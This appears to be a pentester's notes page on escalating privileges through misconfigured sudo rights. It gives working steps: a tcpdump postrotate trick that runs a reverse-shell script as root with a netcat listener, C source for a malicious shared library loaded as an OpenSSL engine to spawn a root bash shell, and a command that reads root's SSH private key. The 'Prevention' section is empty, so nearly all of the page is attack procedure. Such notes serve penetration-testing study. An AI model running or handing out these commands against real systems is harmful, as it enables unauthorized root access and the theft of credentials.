Skip to content

SUDO Right Abuse

  • check current users sudo privileges - sudo -l
  • if our user is mentioned in the /etc/sudoers file, only then we'll be able to run commands as sudo using our password
  • eg:
    • user has (ALL) NOPASSWD: /usr/sbin/tcpdump permission
    • we can create a shell script invoking a reverse shell .test file in /tmp
    • using -z - postrotate-command
    • sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

Steps:

  • create /tmp/.test with a reverse shell
  • start a nc listener
  • run tcmpdump as root
    • sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

OPENSSL

This is the standard "GTFOBins" approach for getting a full interactive root shell. You generate a small piece of C code, compile it as a shared library, and tell OpenSSL to load it as an "engine." Step 1: Create the C payload On your attack machine (or the target if it has gcc), create shell.c: 

#include <unistd.h>
#include <stdlib.h>

void __attribute__ ((constructor)) setup() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}

Step 2: Compile as a Shared Object (.so) 

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Step 3: Execute via Sudo Transfer shell.so to the target and run: 

sudo openssl engine -t -c "$(pwd)/shell.so"
Because openssl is running as root, the constructor in your library executes with root privileges, giving you a root shell.

OR SIMPLER 

srvadm@dmz01:~$ LFILE=/root/.ssh/id_rsa
srvadm@dmz01:~$ sudo /usr/bin/openssl enc -in $LFILE

Prevention